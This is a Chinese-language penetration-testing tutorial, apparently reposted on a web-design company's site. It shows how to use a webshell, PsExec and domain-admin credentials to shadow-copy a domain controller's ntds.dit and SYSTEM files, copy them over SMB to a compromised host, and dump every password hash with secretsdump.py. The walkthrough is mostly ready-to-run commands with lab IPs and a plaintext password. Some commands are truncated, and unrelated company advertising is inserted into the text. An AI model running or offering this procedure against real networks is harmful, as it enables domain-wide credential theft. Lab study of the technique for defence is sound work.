如何通過(guò)Webshell遠(yuǎn)程導(dǎo)出域控ntds.dit

這篇文章給大家分享的是有關(guān)如何通過(guò)Webshell遠(yuǎn)程導(dǎo)出域控ntds.dit的內(nèi)容。小編覺得挺實(shí)用的，因此分享給大家做個(gè)參考，一起跟隨小編過(guò)來(lái)看看吧。

讓客戶滿意是我們工作的目標(biāo)，不斷超越客戶的期望值來(lái)自于我們對(duì)這個(gè)行業(yè)的熱愛。我們立志把好的技術(shù)通過(guò)有效、簡(jiǎn)單的方式提供給客戶，將通過(guò)不懈努力成為客戶在信息化領(lǐng)域值得信任、有價(jià)值的長(zhǎng)期合作伙伴，公司提供的服務(wù)項(xiàng)目有：域名注冊(cè)、網(wǎng)頁(yè)空間、營(yíng)銷軟件、網(wǎng)站建設(shè)、尼元陽(yáng)網(wǎng)站維護(hù)、網(wǎng)站推廣。

在滲透測(cè)試期間我也面臨了同樣的問(wèn)題（沒有公網(wǎng)IP服務(wù)器）。在稍稍討論了該問(wèn)題之后，我找到了一種方法，如果我們有“AD Domain Admin”用戶憑據(jù)，那么通過(guò)WebShell就可以幫助我們實(shí)現(xiàn)上述目標(biāo)。

這里，我們假設(shè)：

1、AD域控機(jī)器（queen.DC1.indishell.lab - 192.168.56.200）

2、被控制的Windows機(jī)器 - 連接到AD（LABONE - 192.168.56.101）

3、管理獲取Windows AD域管理用戶（你可以使用任何可用的exploit，在這里我使用的是“MS14-025”來(lái)獲得域管理員用戶密碼的）

現(xiàn)在，我可以在Windows機(jī)器上進(jìn)行訪問(wèn)web shell，它連接到域，即“LABONE”，其IP為“192.168.56.101”。域管理員的用戶名為“user1”，密碼為“ica_1046”。

這里，我將使用以下兩個(gè)二進(jìn)制文件：

1、psexec.exe < - Windows內(nèi)部工具

2、vssadmin < - 用于創(chuàng)建/刪除Windows驅(qū)動(dòng)器的卷影副本的命令

無(wú)論如何，如果我們?cè)O(shè)法在Windows AD域控機(jī)器上運(yùn)行“vssadmin”命令，“vssadmin”命令將生成“C”盤的卷影副本，并且從該卷影副本我們可以復(fù)制“ntds.dit”和“SYSTEM”文件。為了實(shí)現(xiàn)上述任務(wù)，我們將使用“psexec.exe”，如果我們使用“elevated”選項(xiàng)（通過(guò)指定-h）指定目標(biāo)計(jì)算機(jī)IP、域管理員用戶名及其密碼，則可以在遠(yuǎn)程Windows計(jì)算機(jī)上執(zhí)行命令。我們需要通過(guò)web shell在Windows機(jī)器“LABONE”上上傳psexec.exe。從Web shell我們將使用“vssadmin”命令指定AD域控機(jī)器IP，域管理員用戶名及其密碼。

psexec文件將遠(yuǎn)程執(zhí)行Windows AD域控計(jì)算機(jī)上的vssadmin命令。在創(chuàng)建“C”盤卷影副本之后，我們需要將“ntds.dit”和“SYSTEM”文件從該卷影副本復(fù)制到我們具有Web shell訪問(wèn)權(quán)限的機(jī)器上，即Windows域機(jī)器“LABONE”。這個(gè)任務(wù)可以通過(guò)使用“psexec”來(lái)完成，我們只需在“copy”命令中指定目標(biāo)AD域控機(jī)器的IP，域管理員用戶名和密碼即可，請(qǐng)使用SMB將ndts.dit和SYSTEM文件從卷影副本復(fù)制到LABONE機(jī)器。這里，我將這些文件復(fù)制到了我轉(zhuǎn)儲(chǔ)psexec文件的同一目錄下。

使用“psexec”在遠(yuǎn)程主機(jī)上執(zhí)行命令的常規(guī)用法：

psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute"<br />

就我而言，我應(yīng)填寫如下信息：

remote_IP 192.168.56.200（queen.DC1.indishell.lab）

user_name user1

password_of_the_user ica_1046

我在Windows域機(jī)器“LABONE”上具有web shell訪問(wèn)權(quán)限，并在服務(wù)器上傳了psexec二進(jìn)制文件。

首先，我們先來(lái)檢查下是否有“C”盤的卷影副本可用。你可以使用以下命令來(lái)列出可用的卷影副本：

vssadmin list shadows

這里，web shell無(wú)法顯示遠(yuǎn)程主機(jī)上psexec binary執(zhí)行的所有命令輸出，所以我將命令輸出重定向到了“LABONE”上，并保存在C:\xampp\htdocs\box\ps\目錄下。執(zhí)行該步驟的命令如下：

PsExec.exe  \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin list shadows > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"

Web shell顯示psexec正在遠(yuǎn)程Windows AD域控機(jī)器上執(zhí)行命令。如果一切順利，我們將在目錄“C:\xampp\htdocs\box\ps”中獲取到一個(gè)名為“out.txt”的文件，它將包含在AD域控（192.168.56.200）上執(zhí)行的“vssadmin list shadows”命令的輸出。

可以看到out.txt文件已生成在了目錄中，讓我們來(lái)查看下其中的內(nèi)容。

“out.txt”文件內(nèi)容顯示，目標(biāo)域控機(jī)器到目前為止并沒有任何的卷影副本。

讓我們創(chuàng)建一個(gè)“C”盤的卷影副本，以竊取“ntds.dit”和“SYSTEM”文件。

用于創(chuàng)建c盤卷影副本的命令如下：

vssadmin create shadow /for=C:

我們需要有新創(chuàng)建的“C”盤卷影副本的名稱它將在命令的輸出中，因此我們將把上述命令的輸出重定向到我們擁有web shell訪問(wèn)權(quán)的機(jī)器上。

要從目標(biāo)機(jī)器復(fù)制“ntds.dit”和“SYSTEM”文件，我們需要有卷影副本的名稱。最終的命令為：

PsExec.exe  \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin create shadow /for=C: >

以上命令，psexec正在Windows AD域控機(jī)器（192.168.56.200）上執(zhí)行命令創(chuàng)建“C”盤的卷影副本，然后將該命令的輸出重定向到 "LABONE"機(jī)器的 "C:\xmpp\htdocs\box\ps\out.txt"文件中。

“out.txt”文件的內(nèi)容將告訴我們卷影副本的位置。

在以上截圖中我們可以看到，卷影副本的卷名為“\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\”。

“ntds.dit”和“SYSTEM”文件的位置如下：

"shadow_copy_volume_name\Windows\NTDS\NTDS.dit"

 "shadow_copy_volume_name\Windows\System32\config\SYSTEM"

即：

"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit"

"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM"

讓我們使用以下命令從目標(biāo)Windows AD域控機(jī)器復(fù)制“ntds.dit”文件：

PsExec.exe  \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit  \\192.168.56.101\C$\xampp\htdocs\box\ps\"

此命令將會(huì)將“ntds.dit”文件從遠(yuǎn)程機(jī)器（192.168.56.200）復(fù)制到“LABONE”機(jī)器（192.168.56.101）的“C:\xampp\htdocs\box\ps\”目錄下。

可以看到web shell顯示，一個(gè)文件已從目標(biāo)DC機(jī)器復(fù)制到了我的機(jī)器上。讓我們確認(rèn)并檢查“C:\xampp\htdocs\box\ps”看看是否已成功復(fù)制“ntds.dit”文件。

如上所示，“ntds.dit”文件已成功被復(fù)制到了“LABONE”機(jī)器上。

同樣，我們使用該命令復(fù)制“SYSTEM”文件：

PsExec.exe  \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM

命令執(zhí)行成功，Web shell顯示“1 file copied”的消息提示。再次檢查并確認(rèn)是否成功執(zhí)行。

可以看到“SYSTEM”文件也已成功被復(fù)制到了 "LABONE"機(jī)器上。我們可以從這里使用web shell下載這些文件。

現(xiàn)在，我們可以使用python腳本secretsdump.py，從“ntds.dit”和“SYSTEM”文件中提取Domain，udi，rid LM和NT hashes。命令如下：

python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

結(jié)果如下：

感謝各位的閱讀！關(guān)于“如何通過(guò)Webshell遠(yuǎn)程導(dǎo)出域控ntds.dit”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，讓大家可以學(xué)到更多知識(shí)，如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到吧！

新聞名稱：如何通過(guò)Webshell遠(yuǎn)程導(dǎo)出域控ntds.dit
URL標(biāo)題：http://muchs.cn/article8/pidpip.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供虛擬主機(jī)、面包屑導(dǎo)航、微信小程序、外貿(mào)建站、企業(yè)網(wǎng)站制作、網(wǎng)站改版

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)